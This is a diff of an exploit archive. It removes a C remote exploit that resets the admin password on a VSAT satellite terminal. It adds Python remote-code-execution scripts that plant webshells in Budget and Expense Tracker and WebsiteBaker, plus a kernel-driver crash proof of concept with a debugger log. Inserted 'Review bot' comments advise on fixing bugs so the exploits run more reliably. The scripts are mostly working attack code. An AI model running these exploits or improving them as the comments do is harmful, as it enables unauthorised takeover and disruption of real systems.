diff --git a/exploits/hardware/remote/35932.c b/exploits/hardware/remote/35932.c
deleted file mode 100644
index 1974f3feb..000000000
--- a/exploits/hardware/remote/35932.c
+++ /dev/null
@@ -1,254 +0,0 @@ -/* - ** File : satcompwn.c - [VSAT SAILOR SAT COM 900 Remote 0day] - ** Author : Nicholas Lemonias - ** - ** This is proprietary source code material of Advanced Information Security Corporation. - ** Usage, distribution and modifications are pursuant to our terms of agreement. - ** - ** - ** Copyright (c) 2009-2014, Advanced Information Security Corporation as represented by the - ** author of this software. - ** All rights reserved. - ** - ** - ** This research demo is for academic research purposes ONLY. You may only use this software for - ** educational purposes, or for the purpose of academic research. - ** This work is copyright protected. You may not, copy, or distribute - ** or use this in any other way, without prior authorisation. This work is covered by DMCA and - ** other applicable intellectual property laws. - ** - ** #@#@~ VSAT SAILOR 900 / SATCOM (iDirect/Linux) - ** - ** Poc Tested on our: iDirect Infiniti VMU/SATCOM v.1.47 Build 9 - ** Platform Frequency: Ku/Ka band - ** Compatible Networks: Jabiru, Inmarsat GX, and Intelsat's Epic - ** - */ - - /**************************************************************************************** - (c) 2014 Advanced Information Security Corporation - *****************************************************************************************/ - - - /* - ** Compilation: cc satcompwn.c -o satcompwn - ** HOW-TO: - ** - ** Usage: ./satcompwn \n - ** - ** - */ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define BUFFER_MAX_SIZE 65535 -#define BUFFER_MIN_LEN 230 - -ssize_t payload(int sock, char *hst, char *pg, char *pss) -{ - char BUF_SIZE_S[BUFFER_MAX_SIZE + 1], BUF_SIZE_R[BUFFER_MAX_SIZE + 1]; - ssize_t n; char *l; - - snprintf(BUF_SIZE_S, BUFFER_MIN_LEN, - "POST %s HTTP/1.0\n\n" - "Host: %s\r\n" - "Content-type: application/x-www-form-urlencoded\r\n" - 
"Content-length: %zu \r\n" - "Cookie: tt_adm=694020\r\n" - "%s \r\n\n", pg, hst, strlen(pss), pss); - - if(write(sock,BUF_SIZE_S, strlen(BUF_SIZE_S)) == -1) { - error("Read error"); - return -1; -} - printf("\n"); - printf("Sending Payload.....\n"); - - printf("\n\n"); - printf("%s", BUF_SIZE_S, sizeof(BUF_SIZE_S)); - - - while ((n =read(sock,BUF_SIZE_R,sizeof(BUF_SIZE_R))) > 0){ - BUF_SIZE_R[n] = '\0'; - - if(n == -1) { - error("Read error"); - return -1; -} - - - - if ( strstr(BUF_SIZE_R, "404")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.5 - False Positive HTTP ERROR [404] Host is not a V-SAT Sailor 900 terminal.\n\n\n"); - if ( strstr(BUF_SIZE_R, "401")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.2 - HTTP Unauthorized [401] Unauthorized Access to remote host.\n\n\n"); - if ( strstr(BUF_SIZE_R, "500")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.1 - HTTP Internal Server Error [500] Internal Server Error - The remote host couldn't recognise the request. This is not a valid SAILOR 900 terminal.\n\n\n"); - if ( strstr(BUF_SIZE_R, "303")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.4 - HTTP See Other [303] Possible Redirect - The code received says it is temporary under a different URL. This is not a valid SAILOR 900 terminal.\n\n\n"); - if ( strstr(BUF_SIZE_R, "307")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.3.8 - HTTP Temporary Redirect [307] Possible Redirect - The requested resource received indicates redirection. This is not a valid SAILOR 900 terminal.\n\n\n"); - if ( strstr(BUF_SIZE_R, "403")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.4 - HTTP Forbidden [403] The remote server/ understood the request, but is refusing to fulfill it.\n\n\n"); - if ( strstr(BUF_SIZE_R, "407")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.8 - HTTP Proxy Authentication Required [407] - The remote terminal requires HTTP authentication. 
If this is a valid SAILOR 900 terminal, it is protected with HTTP authentication.\n\n\n"); - if ( strstr(BUF_SIZE_R, "408")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.4.9 - HTTP Request Time out [408] - The client did not produce a request within the time that the server was prepared to wait.\n\n\n"); - if ( strstr(BUF_SIZE_R, "503")) printf("\n\n[x] Exploit Failed Ref. RFC 2616, 10.5.4 - HTTP Service Unavailable [503] - Connection Refused. The hostname of the terminal provided is currently unable to handle the request.\n\n\n"); - if ( strstr(BUF_SIZE_R, "411")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 411 - Length Required. This is not a valid SAILOR 900 terminal.\n\n\n"); - if ( strstr(BUF_SIZE_R, "400")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 400 - Bad Request. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n"); - if ( strstr(BUF_SIZE_R, "301")) printf("\n\n[x] Exploit Failed Ref. RFC 2616 - Error 301 - Moved Permanently. This is not a valid SAILOR 900 terminal. The request could not be understood by the remote server.\n\n\n"); - if ( strstr(BUF_SIZE_R, "BAD REQUEST")) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal.\n\n\n"); - - if ( strstr(BUF_SIZE_R, "202")) { - - while ( (l=strstr(BUF_SIZE_R,"Thrane & Thrane")) == NULL ) printf("\n\n[x] Exploit Failed. This is not a valid SAILOR 900 terminal...\n\n\n"); } - - else if (strstr(BUF_SIZE_R, "Thrane & Thrane") != NULL && strstr(BUF_SIZE_R, "302") == NULL){ - printf("[x] Mission Successful Ref. RFC 2616, 10.2.3 - HTTP Okay [202] The remote host is a V-SAT Sailor 900. 
Please Login as administrator: user:admin & pass:aisatpwn2134 on %s\n\n\n", hst); - } -} - printf("***********************************************************************\n"); - printf("*Advanced Information Security Corporation, 2014 - All Rights Reserved*\n"); - printf("***********************************************************************\n"); - printf("* Please wait.. I will provide you with some more information below:\n"); - printf("***********************************************************************\n"); - printf("\n\n\n\n"); - printf("%s \n\n", BUF_SIZE_R, sizeof(BUF_SIZE_R)); - - return n; - -} - -int main (int argc, char *argv[]) { - - - char *pg = "/index.lua?pageID=administration"; - char *pss = "&usernameAdmChange=admin" - "&passwordAdmChange=aisatpwn2134"; - - // char *cval = "tt_adm=tt_adm=694020"; - - long arg; - int sock, opt, evalopt, s; - - -if(argc < 2) -{ - printf("***********************************************************************\n"); - printf("(Advanced Information Security Corporation, 2014 - All Rights Reserved*\n"); - printf("***********************************************************************\n"); - printf("* *\n"); - printf("* (V-SAT SAILOR 900 Remote Exploit) *\n"); - printf("***********************************************************************\n"); - printf("* Disclaimer: This is proprietary source code material of Advanced *\n"); - printf("* Information Security Corporation. This software is for *\n"); - printf("* research purposes only. *\n"); - printf("***********************************************************************\n"); - printf("* VSAT Sailor 900 / Tested on iDirect Infiniti VMU v.1.47 Build 9 *\n"); - printf("* Description: *\n"); - printf("* The Sailor 900 VSAT is an advanced maritime stabilised Ku/Ka band *\n"); - printf("* platform with integrated GPS, compatible with a number of satellite *\n"); - printf("* networks, such as Jabiru, Inmarsat GX, and Intelsat's Epic. 
*\n"); - printf("***********************************************************************\n"); - printf("\n\n"); - fprintf(stderr, " Main Menu \n"); - fprintf(stderr, " Usage: %s \n", argv[0]); - exit(1); -} - struct timeval tv; - struct sockaddr_in remote; - struct hostent *host; - socklen_t lon; - - - host = gethostbyname((void *)argv[1]); - - fd_set wset; - fd_set rset; - - sock = socket(AF_INET,SOCK_STREAM,0); - remote.sin_port = htons(atoi(argv[2])); - remote.sin_addr.s_addr = htonl(INADDR_ANY); - remote.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr; - remote.sin_family = AF_INET; - memset(remote.sin_zero,0,sizeof(remote.sin_zero)); - fflush(stdout); - - - if (sock == -1) { - perror("socket creation error"); - return -1; - } - FD_ZERO( &wset ); - FD_SET( sock , &wset ); - - FD_ZERO( &rset ); - FD_SET( sock , &rset ); - - tv.tv_sec = 3; - tv.tv_usec = 0; - - - s = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr)); - if (s == -1 ) { - perror("connection "); - return -1;} - - if( errno != 0) { - perror("connection "); - return -1; - } - - arg = fcntl(sock, F_GETFL, NULL); - arg |= O_NONBLOCK; - fcntl(sock, F_SETFL, arg); - if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 ) { - perror("fcntl error"); - return -1; - } - - opt = select(sock+1,NULL,&wset,NULL,&tv); - - if( opt == -1 ) { - perror("select"); - return -1; - } - if (opt > 0) { - lon = sizeof(int); - getsockopt(sock, SOL_SOCKET, SO_ERROR, (void*)(&evalopt), &lon); - - if (evalopt) { - fprintf(stderr, "Socket Connection Error Code at: %d - %s\n", evalopt, strerror(evalopt)); - exit(0); - } - - -if( fcntl( sock , F_SETFL , 0 ) == -1 ) { - perror("fcntl"); - printf("[RST-FCNTL] FCNTL Error. Exiting the software.\n\n"); - return -1; -} - - -if( payload(sock,host->h_name,pg,pss) != 1) printf("\n\n[x] Payload Sent. 
Please check server responses above to verify status.\n\n");
-
-
- arg = fcntl(sock, F_GETFL, NULL);
- arg &= (~O_NONBLOCK);
- fcntl(sock, F_SETFL, arg);
-
- close(sock);
- exit(1);
- }
-
-}
\ No newline at end of file
diff --git a/exploits/php/webapps/50308.txt b/exploits/php/webapps/50308.txt
new file mode 100644
index 000000000..7b235bf01
--- /dev/null
+++ b/exploits/php/webapps/50308.txt
@@ -0,0 +1,129 @@ +# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Exploit Author: Abdullah Khawaja (hax.3xploit) +# Date: 2021-09-21 +# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip +# Version: 2.0 +# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 +# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. + + + +# RCE via executing exploit: + # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py + # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/ + + +import requests, sys, urllib, re +import datetime +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + + + + + +header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL + +print(Style.BRIGHT+" Budget and Expense Tracker System 1.0") +print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) +print(header) + +print(r""" + ______ _______ ________ + ___ //_/__ /_______ ___ _______ ______(_)_____ _ + __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ + _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / + /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ + /___/ + abdullahkhawaja.com + """) + + + +GREEN = '\033[32m' # Green Text +RED = '\033[31m' # Red Text +RESET = '\033[m' # reset to the defaults + +proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} + + +#Create a new 
session +s = requests.Session() + + +#Set Cookie +cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} + +LINK=input("Enter URL of The Vulnarable Application : ") + + +def webshell(LINK, session): + try: + WEB_SHELL = LINK+'/uploads/'+filename + getdir = {'cmd': 'echo %CD%'} + r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies) + status = r2.status_code + if status != 200: + print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + while True: + thought = input(term) + command = {'cmd': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print("\r\nExiting.") + sys.exit(-1) + + +#Creating a PHP Web Shell + +phpshell = { + 'img': + ( + 'shell.php', + '', + 'application/octet-stream', + {'Content-Disposition': 'form-data'} + ) + } + +# Defining value for form data +data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'} + + +def id_generator(): + x = datetime.datetime.now() + date_string = x.strftime("%y-%m-%d %H:%M") + date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") + timestamp = datetime.datetime.timestamp(date) + file = int(timestamp) + final_name = str(file)+'_shell.php' + return final_name + +filename = id_generator() +#Uploading Reverse Shell +print("[*]Uploading PHP Shell For RCE...") +upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies) + +shell_upload = True if("1" in upload.text) else False +u=shell_upload +if u: + print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) +else: + print(RED+"[-]Failed To Upload 
The PHP Shell!", RESET)
+
+
+
+#Executing The Webshell
+webshell(LINK, s)
\ No newline at end of file
diff --git a/exploits/php/webapps/50310.py b/exploits/php/webapps/50310.py
new file mode 100755
index 000000000..cf5455acc
--- /dev/null
+++ b/exploits/php/webapps/50310.py
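Review bot: The two request paths disagree on how `LINK` is joined: the upload posts to `LINK+'classes/SystemSettings.php?f=update_settings'` with no separator, while `webshell()` fetches `LINK+'/uploads/'+filename` with a leading slash, so the script only works when the operator types the trailing slash exactly as in the usage example, and even then the shell URL contains `//`. Normalising once after `input()` with `LINK = LINK.rstrip('/') + '/'` and dropping the leading slash in `webshell()` removes that dependence on user input. The bare `except:` in `webshell()` also hides the real failure: with `proxies` hard-coded to 127.0.0.1:8080, a missing interception proxy surfaces only as "Exiting." — catch `requests.RequestException as e` and print `e` instead. The file body in the `phpshell` tuple is an empty string in this listing; if that is not an extraction artefact, the uploaded file carries no payload for `webshell()` to drive, and the `"1" in upload.text` check would still report success.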
@@ -0,0 +1,290 @@ +# Exploit Title: WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated) +# Date: 18-09-2021 +# Exploit Author: Halit AKAYDIN (hLtAkydn) +# Vendor Homepage: https://websitebaker.org/ +# Software Link: http://wiki.websitebaker.org/doku.php/en/downloads +# Version: 2.13.0 +# Category: Webapps +# Tested on: Linux/Windows + +# WebsiteBaker Open Source Content Management +# Includes an endpoint that allows remote access +# Language page misconfigured, causing vulnerability +# User information with sufficient permissions is required. +# I had to write a long script to bypass some security measures. + +# Example: python3 exploit.py -u http://example.com -l admin -p Admin123 +# python3 exploit.py -h + + +from bs4 import BeautifulSoup +from time import sleep +import requests +import argparse + + +def main(): + parser = argparse.ArgumentParser( + description='WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)' + ) + parser.add_argument('-u', '--host', type=str, required=True) + parser.add_argument('-l', '--login', type=str, required=True) + parser.add_argument('-p', '--password', type=str, required=True) + args = parser.parse_args() + print("\nWebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)", + "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") + sleep(2) + find_default(args) + + + +def find_default(args): + #Check http or https + if args.host.startswith(('http://', 'https://')): + print("[?] Check Url...\n") + args.host = args.host + if args.host.endswith('/'): + args.host = args.host[:-1] + sleep(2) + else: + print("\n[?] 
Check Adress...\n") + args.host = "http://" + args.host + args.host = args.host + if args.host.endswith('/'): + args.host = args.host[:-1] + sleep(2) + + + # Check Host Status + try: + response = requests.get(args.host) + if response.status_code != 200: + print("[-] Address not reachable!\n") + sleep(2) + exit(1) + + except requests.ConnectionError as exception: + print("[-] Address not reachable!\n") + sleep(2) + exit(1) + + exploit(args) + + url = args.host + "/admin/login/index.php" + headers = { + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": args.host + "/admin/addons/index.php", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close" + } + response = requests.get(url, headers=headers) + for cookie in response.cookies: + phpsessid_name = cookie.name + + soup = BeautifulSoup(response.text, 'html.parser') + input_hidden_username = (soup.find_all("input", type="hidden")[1].get("value")) + input_hidden_password = (soup.find_all("input", type="hidden")[2].get("value")) + input_hidden_name = (soup.find_all("input", type="hidden")[3].get("name")) + input_hidden_value = (soup.find_all("input", type="hidden")[3].get("value")) + + + login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value) + + + +def login(args, phpsessid_name, input_hidden_username, input_hidden_password, input_hidden_name, input_hidden_value): + + session = requests.session() + + url = args.host + "/admin/login/index.php" + cookies = { + "klaro": "{'klaro':true,'mathCaptcha':true}" + } + + headers = { + "Cache-Control": "max-age=0", + "Upgrade-Insecure-Requests": "1", + "Origin": args.host, + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": 
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": args.host + "/admin/login/index.php", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", "Connection": "close" + } + + data = { + "url": '', + "username_fieldname": input_hidden_username, + "password_fieldname": input_hidden_password, + input_hidden_name: input_hidden_value, + input_hidden_username : args.login, + input_hidden_password : args.password, + "submit": '' + } + + + response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) + new_cookie = (response.cookies.get(phpsessid_name)) + + if response.headers.get("Location") == args.host + "/admin/start/index.php": + print("[+] Success Login...\n") + sleep(2) + check_pers(args, phpsessid_name, new_cookie) + else: + print("[-] Login Failed...\n") + print("Your username or password is incorrect.") + sleep(2) + + +def check_pers(args, phpsessid_name, new_cookie): + url = args.host + "/admin/languages/install.php" + cookies = { + "klaro": "{'klaro':true,'mathCaptcha':true}", + phpsessid_name : new_cookie + } + headers = { + "Cache-Control": "max-age=0", + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close" + } + response = requests.get(url, headers=headers, cookies=cookies) + soup = BeautifulSoup(response.text, 'html.parser') + + if (soup.find_all("title")[0].text == "Enter your website title » Administration - Add-ons"): + find_token(args, phpsessid_name, new_cookie) + else: + print("[!] 
Unauthorized user!\n\n") + print("Requires user with language editing permissions.") + sleep(2) + exit(1) + + +def find_token(args, phpsessid_name, new_cookie): + url = args.host + "/admin/languages/index.php" + cookies = { + "klaro": "{'klaro':true,'mathCaptcha':true}", + phpsessid_name : new_cookie + } + headers = { + "Cache-Control": "max-age=0", + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close" + } + response = requests.get(url, headers=headers, cookies=cookies) + soup = BeautifulSoup(response.text, 'html.parser') + token_hidden_name = soup.find_all("input", type="hidden")[5].get("name") + token_hidden_value = soup.find_all("input", type="hidden")[5].get("value") + + + if soup.find_all("option")[1].text == "": + exploit(args) + elif soup.find_all("option")[20].text == "Türkçe": + token_lang = soup.find_all("option")[20].get("value") + uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang) + else: + install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value) + pass + + +def install_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value): + url = args.host + "/admin/languages/install.php" + cookies = { + "klaro": "{'klaro':true,'mathCaptcha':true}", + phpsessid_name: new_cookie + } + + headers = { + "Cache-Control": "max-age=0", + "Upgrade-Insecure-Requests": "1", + "Origin": args.host, + "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryCyjXuM2KSAsqjze1", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", + "Accept": 
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": args.host + "/admin/languages/index.php", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close" + } + + data = "------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\ninstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"advanced\"\r\n\r\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\""+token_hidden_name+"\"\r\n\r\n"+token_hidden_value+"\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"TR.php\"\r\nContent-Type: application/x-php\r\n\r\n\n\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nInstall\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1\r\nContent-Disposition: form-data; name=\"overwrite\"\r\n\r\ntrue\r\n------WebKitFormBoundaryCyjXuM2KSAsqjze1--\r\n" + response = requests.post(url, headers=headers, cookies=cookies, data=data) + soup = BeautifulSoup(response.text, 'html.parser') + # print(soup.find_all("div", class_="w3-text-grey w3--medium")) + print("[!] 
Installing Vuln Lang File!\n") + sleep(2) + find_token(args, phpsessid_name, new_cookie) + + + +def uninstall_lang(args, phpsessid_name, new_cookie, token_hidden_name, token_hidden_value, token_lang): + + url = args.host + "/admin/languages/uninstall.php" + cookies = { + "klaro": "{'klaro':true,'mathCaptcha':true}", + phpsessid_name: new_cookie + } + headers = { + "Cache-Control": "max-age=0", + "Upgrade-Insecure-Requests": "1", + "Origin": args.host, + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "Referer": args.host + "/admin/languages/index.php", + "Accept-Encoding": "gzip, deflate", + "Accept-Language": "en-US,en;q=0.9", + "Connection": "close" + } + data = { + "action": "uninstall", + "advanced": '', + token_hidden_name : token_hidden_value, + "file": token_lang, + "submit": "Uninstall" + } + response = requests.post(url, headers=headers, cookies=cookies, data=data) + soup = BeautifulSoup(response.text, 'html.parser') + print("[!] 
Uninstall Lang File!\n") + # print(soup.find_all("div", class_="w3-text-grey w3--medium")) + sleep(2) + find_token(args, phpsessid_name, new_cookie) + + + +def exploit(args): + response = requests.get(args.host + "/languages/TR.php?cmd=whoami") + if response.status_code == 200: + print("[*] Exploit File Exists!\n") + sleep(2) + print("[+] Exploit Done!\n") + sleep(2) + + while True: + cmd = input("$ ") + url = args.host + "/languages/TR.php?cmd=" + cmd + headers = { + "Upgrade-Insecure-Requests": "1", + "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" + } + + response = requests.post(url, headers=headers, timeout=5) + + if response.text == "": + print(cmd + ": command not found\n") + else: + print(response.text) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/windows/dos/50311.py b/exploits/windows/dos/50311.py new file mode 100755 index 000000000..eea39e2a2 --- /dev/null +++ b/exploits/windows/dos/50311.py 
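Review bot: In `exploit()` the command is concatenated straight into the query string, `url = args.host + "/languages/TR.php?cmd=" + cmd`, so any command containing a space, `&` or `#` is truncated or mis-parsed by the server; pass it as `params={'cmd': cmd}` to `requests.post` so it is percent-encoded. The `find_token` → `install_lang`/`uninstall_lang` → `find_token` cycle has no termination guard: if the install response does not change the `<option>` list the way the hard-coded indexes `[1]` and `[20]` expect, the script recurses without bound at one round per two-second sleep — a retry counter, or checking the install response before re-entering `find_token`, would bound it. The `userfile` part of the multipart body in `install_lang` holds only a newline in this listing; if the PHP payload was not lost in extraction, the installed TR.php has no `cmd` handler for `exploit()` to call. Finally, the failure branch of `login()` prints the message but never calls `exit(1)`, so a wrong password ends the run with a zero exit status.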
@@ -0,0 +1,300 @@ +# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC) +# Date: 2021/04/07 +# Exploit Author: Quadron Research Lab +# Version: all version +# Tested on: Windows 10 x64 HUN/ENG Professional +# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029 +# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr + +import ctypes, sys +from ctypes import * +import io +from itertools import product +from sys import argv + +devicename = "GM312Fltr" + +ioctl = 0x22245C + +ioctl_list = ''' +0x22245C +0x222440 +0x222441 +0x222400 +0x222404 +0x222408 +0x222420 +0x222424 +0x222448 +0x222450 +0x22245c +0x222460 +''' + +kernel32 = windll.kernel32 +hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None) + +if not hevDevice or hevDevice == -1: + print ("Not Win! Sorry!") + +else: + print ("OPENED!") + + buf = 'A' * 2000 + bufLength = 2000 + + kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) + +[Bugcheck Analysis] +Fatal System Error 0x000000f7 + (0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000) + +Break instruction exception - code 80000003 (first chance) +nt!DbgBreakPointWithStatus +fffff807`2e1feb90 cc int 3 +0 kd !analyze +Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE +Loading Kernel Symbols +............................................................... +................................................................ +........................ + +Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long. +Run !sym noisy before .reload to track down problems loading symbols. + +........................................ +............................. +Loading User Symbols +............................................. +Loading unloaded module list +........ 
+ + + Bugcheck Analysis + + + +DRIVER_OVERRAN_STACK_BUFFER (f7) +A driver has overrun a stack-based buffer. This overrun could potentially +allow a malicious user to gain control of this machine. +DESCRIPTION +A driver overran a stack-based buffer (or local variable) in a way that would +have overwritten the function's return address and jumped back to an arbitrary +address when the function returned. This is the classic buffer overrun +hacking attack and the system has been brought down to prevent a malicious user +from gaining complete control of it. +Do a kb to get a stack backtrace -- the last routine on the stack before the +buffer overrun handlers and bugcheck call is the one that overran its local +variable(s). +Arguments +Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack +Arg2 0000f80736bc1742, Expected security check cookie +Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie +Arg4 0000000000000000, zero + +Debugging Details +------------------ + + +BUGCHECK_CODE f7 + +BUGCHECK_P1 bebea1caeaf0a2c1 + +BUGCHECK_P2 f80736bc1742 + +BUGCHECK_P3 ffff07f8c943e8bd + +BUGCHECK_P4 0 + +PROCESS_NAME pythonw.exe + +SYMBOL_NAME GM312Fltr+e1e + +MODULE_NAME GM312Fltr + +IMAGE_NAME GM312Fltr.sys + +FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function + +FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d} + +Followup MachineOwner +--------- + +0 kd kb +RetAddr Args to Child Call Site +fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus +fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12 +fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946 +fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107 +fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 
